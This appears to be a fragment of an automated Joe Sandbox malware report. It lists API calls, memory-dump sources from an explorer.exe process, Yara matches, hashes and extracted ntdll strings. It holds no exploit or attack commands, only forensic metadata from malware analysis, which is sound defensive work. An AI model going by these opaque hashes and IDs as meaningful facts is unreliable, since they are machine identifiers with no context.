                  • Instruction Fuzzy Hash: 20E09A76200208BBD710EE99DC54FEB37ADEFC8714F008408FA08A7281C670B8118BF4
                  APIs
                  • RtlAllocateHeap.NTDLL(02F01859,?,02F149BB,02F01859,02F14767,02F149BB,?,02F01859,02F14767,00001000,?,?,02F19CC0), ref: 02F1843F
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction ID: 49a0bf5067eec19d0854e9b20083f55bf6afe5c21affe487fda85b75f09744a0
                  • Opcode Fuzzy Hash: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction Fuzzy Hash: D8E0657A200218BBD610EE58DC50FAB33ADEFC9714F008418FA08A7242DB70B811CBB4
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 02F07F0C
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 53b62661df330cc76a6816973fe11752289265eb19cc7148155104352092fc4d
                  • Instruction ID: 7868627dc2a397f7e030d80cf2271fb865f14a331b6bf7ed13747edd106171a6
                  • Opcode Fuzzy Hash: 53b62661df330cc76a6816973fe11752289265eb19cc7148155104352092fc4d
                  • Instruction Fuzzy Hash: 10E0807155020827FB2476A8DC85F66735C4748765F584990FF1CDB1C1D774F5119194
                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,02F01B40,02F16E87,02F14767,?), ref: 02F07D23
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: f614c38a97dfa873851f1d801cad7d4b59d04fdde926537a29b977b1b3f48eb4
                  • Instruction ID: 239a4b68451b9eb00182091c7183c769f11ca44927e51ab2a6ad3f198b9c16a9
                  • Opcode Fuzzy Hash: f614c38a97dfa873851f1d801cad7d4b59d04fdde926537a29b977b1b3f48eb4
                  • Instruction Fuzzy Hash: 00D05E716802087BFA10A7E49C02F5A728D9B98794F0480A4BB0DDB2C2ED65F2018669
                  APIs
                  • PostThreadMessageW.USER32(?,00000111), ref: 02F00D37
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID:
                  • API String ID: 1836367815-0
                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                  • Instruction ID: c90d0ed0f3fad6aede6b356aecde6b2366b8afb4519fd4ff9337b19e93c1e33a
                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                  • Instruction Fuzzy Hash: BED0A767B4100C36A60145846CC1DFEB71CDB846A5F004067FB08D5040DA21590206B1
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 582c3ce8d36b3b0e375ae8eeb443f1757f4ade929f48cd1563abe4c2718574f0
                  • Instruction ID: f172b0ade58c2418d9d5710c7bc8606cd2f96bd9f7e672eae44780fe50b17fb1
                  • Opcode Fuzzy Hash: 582c3ce8d36b3b0e375ae8eeb443f1757f4ade929f48cd1563abe4c2718574f0
                  • Instruction Fuzzy Hash: 6BB09B769015D6C6EA51E7605609B1F79517BD0701F55C062D3030641F4738C1D1E176
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555034508.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4df0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                  • API String ID: 0-3754132690
                  • Opcode ID: 73576cf6adf64a8724e80efe664b950f496f60ff29d5e41104385c4b6e5844bb
                  • Instruction ID: 02cd0768a2022cb3d52f02c51e77e4fe8a52303118fbd7e7cc33bb5e195b62ea
                  • Opcode Fuzzy Hash: 73576cf6adf64a8724e80efe664b950f496f60ff29d5e41104385c4b6e5844bb
                  • Instruction Fuzzy Hash: F9916FF04483988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: ee945bc10eb0a534f6a902d7d7c1908e102d26ff37435c196a3dcb5f412ae72e
                  • Instruction ID: e72c6f19aeef7d8933df0ad8fb91423de18b97a173017f345df82b037d5451ca
                  • Opcode Fuzzy Hash: ee945bc10eb0a534f6a902d7d7c1908e102d26ff37435c196a3dcb5f412ae72e
                  • Instruction Fuzzy Hash: C95129B5B04257BFDB10DF9DA99097EF7F9BB08200B508129E866D7641D634EE108BE1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 3ac4e48eacba65c646a1f1e0b4338e3d12eb29d0a996c012f9fca1a6faa1ca72
                  • Instruction ID: bfe531d18d98def71a10ff4c0bf65cd41d880b21fe9b221172d1a072eb881ac1
                  • Opcode Fuzzy Hash: 3ac4e48eacba65c646a1f1e0b4338e3d12eb29d0a996c012f9fca1a6faa1ca72
                  • Instruction Fuzzy Hash: CF5114B9A40656AFCB60EE5CD890D7FB7FAAF44200B448429E8D6D3641E670EA448B60
                  Strings
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05044742
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05044655
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05044725
                  • Execute=1, xrefs: 05044713
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050446FC
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 05044787
                  • ExecuteOptions, xrefs: 050446A0
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: fd89f2a576625ab2718a7541698566f1ade585a8797e50a9696644ad481b8ee4
                  • Instruction ID: d697e3e8634286da4e2663622183a669e422efc6d08e9b65070cb7f688c7b9dc
                  • Opcode Fuzzy Hash: fd89f2a576625ab2718a7541698566f1ade585a8797e50a9696644ad481b8ee4
                  • Instruction Fuzzy Hash: 91510771700209AAEF21DAA4BD99FFE77A9FB14340F4400A9E906A71C0DB75FA42CF51
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction ID: 3508a772b59b5ee3d44ea23bea03017d14965f72636a45dd382ac8d6a25fdd8d
                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction Fuzzy Hash: D502F372A08341AFD345CF68D894AAEB7F5FF88700F14892DF9854B264DB72E945CB42
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction ID: b0fecc9358e3ecbc1acc553e1f9a2aeb977c199a0dd0e250587de6a79009c1c0
                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction Fuzzy Hash: B981E470E052499EDF24CF68E9507FEBBF2BF55710F184119EC91A7290CB348841C76A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: 3d5916e6c2a61321892a87a54f3083604f6e13766df37f60190d889c0fe31cf5
                  • Instruction ID: 6f9c7122c179418c656b8d7f311994837984cda3f6ff8cd46b66c96fb7fa63b3
                  • Opcode Fuzzy Hash: 3d5916e6c2a61321892a87a54f3083604f6e13766df37f60190d889c0fe31cf5
                  • Instruction Fuzzy Hash: EC21567AA0011AABDB50EF69EC54EFE7BE9EF64644F580116ED45D3200EB30E9118B91
                  Strings
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050402E7
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050402BD
                  • RTL: Re-Waiting, xrefs: 0504031E
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 67d422c3239b05f6f0a171d19a938d3b76cea2ea1cb27db1ea357ae4c5c8ad88
                  • Instruction ID: 881827ba31041282a861a6cff17087c5a02ad6e4962aa1d4b9e113a5c330c948
                  • Opcode Fuzzy Hash: 67d422c3239b05f6f0a171d19a938d3b76cea2ea1cb27db1ea357ae4c5c8ad88
                  • Instruction Fuzzy Hash: 97E1F371608741DFD720CF28D898B2AB7E0BF88714F140A6EF6959B2E0D774E846CB52
                  Strings
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05047B7F
                  • RTL: Re-Waiting, xrefs: 05047BAC
                  • RTL: Resource at %p, xrefs: 05047B8E
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: f448d647054100eb61a84e80de90fc9d59981b9245d7bc45091fd2f6b697cb91
                  • Instruction ID: 5eeacd28b8b01fb6194a5048476e265a886964391f1756d83fc6ab00fa63418d
                  • Opcode Fuzzy Hash: f448d647054100eb61a84e80de90fc9d59981b9245d7bc45091fd2f6b697cb91
                  • Instruction Fuzzy Hash: 4341D1753047029FD720DE25E841B6EB7E6FF89720F000A2DF95A97681DB71E8068F91
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0504728C
                  Strings
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05047294
                  • RTL: Re-Waiting, xrefs: 050472C1
                  • RTL: Resource at %p, xrefs: 050472A3
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 50b5ac32e9f181e877c3d7d8fd7c1f650ef2b01d6fc3a9f8c12da8d8b8949506
                  • Instruction ID: 4dcb94d992fc8107be8f276265f840280c0627bd36e69df255b0d40bb4895a9c
                  • Opcode Fuzzy Hash: 50b5ac32e9f181e877c3d7d8fd7c1f650ef2b01d6fc3a9f8c12da8d8b8949506
                  • Instruction Fuzzy Hash: 5041FFB1704202ABD721DE25ED41FAEB7E6FB94720F100629FC55AB280DB21F842CBD1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 12e73704d592527e5685d2f7089e064520cd3d2301e7993106b84cdade47e003
                  • Instruction ID: a2e5c4c8b7424dd30550361720e50a425edc264070102fd2d1ec00397fc23f56
                  • Opcode Fuzzy Hash: 12e73704d592527e5685d2f7089e064520cd3d2301e7993106b84cdade47e003
                  • Instruction Fuzzy Hash: 66318776A002299FCB60DE28DD54FFEB7F8FF54650F854559E889E3240EB30AA458B60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction ID: 1138955c0db37542352ee46babec88a64cefa57370c47fa2944fa2c792f2fb28
                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction Fuzzy Hash: 7591C271E0420A9BDF64CE69E881ABFB7F6FF44360F14851AEC56E72C0D7309941875A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                  • Instruction ID: 0c04c3f69b0ec78f2c91bc310075ccc09c8ec31ea36fa6a376005840e36f3a60
                  • Opcode Fuzzy Hash: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                  • Instruction Fuzzy Hash: 2C812CB5D002699BDB31CF94CC45BEEB7B9AF08714F0441EAA909B7240D770AE85CFA0
                  APIs
                  • RtlGetReturnAddressHijackTarget.NTDLL ref: 04FD0564
                  Strings
                  • kLsE, xrefs: 04FD0540
                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 04FD063D
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: AddressHijackReturnTarget
                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                  • API String ID: 806345674-2547482624
                  • Opcode ID: fb6a5c04e7a0b25373907789d1b8634a383fe592cf24769c1532efe90eb13dd4
                  • Instruction ID: acc2c4a3f39408b4851de56a314bf734be9657886775dc57772bbb0fa79915c2
                  • Opcode Fuzzy Hash: fb6a5c04e7a0b25373907789d1b8634a383fe592cf24769c1532efe90eb13dd4
                  • Instruction Fuzzy Hash: BF51C171A047469FC724EF24C9447A7BBE6AF85308F08493EE99987240EB74E546CF92